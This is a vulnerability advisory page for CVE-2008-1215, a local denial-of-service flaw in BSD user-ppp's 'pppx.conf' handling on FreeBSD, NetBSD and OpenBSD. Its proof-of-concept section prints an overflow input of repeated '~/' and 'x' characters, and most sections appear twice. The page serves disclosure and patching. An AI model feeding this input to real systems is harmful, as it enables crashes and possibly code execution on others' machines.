BSD PPP 'pppx.conf' Local Denial of Service Vulnerability
BID:28090
Info
BSD PPP 'pppx.conf' Local Denial of Service Vulnerability
| Bugtraq ID: | 28090 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-2008-1215 |
| Remote: | No |
| Local: | Yes |
| Published: | Mar 04 2008 12:00AM |
| Updated: | May 07 2015 05:32PM |
| Credit: | sipher discovered this issue. |
| Vulnerable: |
OpenBSD OpenBSD -current NetBSD NetBSD Current FreeBSD FreeBSD 6.3 |
| Not Vulnerable: | |
Discussion
BSD PPP 'pppx.conf' Local Denial of Service Vulnerability
BSD PPP is prone to a local denial-of-service vulnerability because it fails to perform adequate boundary checks on user-supplied input.
Attackers can leverage this issue to crash the application and deny service to legitimate users. Given the nature of the issue, arbitrary code execution may also be possible, but this has not been confirmed.
This issue affects FreeBSD 6.3 and unspecified versions of NetBSD and OpenBSD; other versions may also be affected.
BSD PPP is prone to a local denial-of-service vulnerability because it fails to perform adequate boundary checks on user-supplied input.
Attackers can leverage this issue to crash the application and deny service to legitimate users. Given the nature of the issue, arbitrary code execution may also be possible, but this has not been confirmed.
This issue affects FreeBSD 6.3 and unspecified versions of NetBSD and OpenBSD; other versions may also be affected.
Exploit / POC
BSD PPP 'pppx.conf' Local Denial of Service Vulnerability
Supplying the following data to the application is sufficient to trigger the issue:
~/~/~/~/~/~/~/~/~/~/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxx
Supplying the following data to the application is sufficient to trigger the issue:
~/~/~/~/~/~/~/~/~/~/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxx
Solution / Fix
BSD PPP 'pppx.conf' Local Denial of Service Vulnerability
Solution:
OpenBSD has issued patches to address this issue. Please see the references for more information.
Solution:
OpenBSD has issued patches to address this issue. Please see the references for more information.
References
BSD PPP 'pppx.conf' Local Denial of Service Vulnerability
References:
References:
- *BSD user-ppp local root (when conditions permit) (sipherr gmail com)
- FreeBSD Homepage (FreeBSD)
- NetBSD Homepage (NetBSD)
- OpenBSD Errata Page (OpenBSD)
- OpenBSD Homepage (OpenBSD)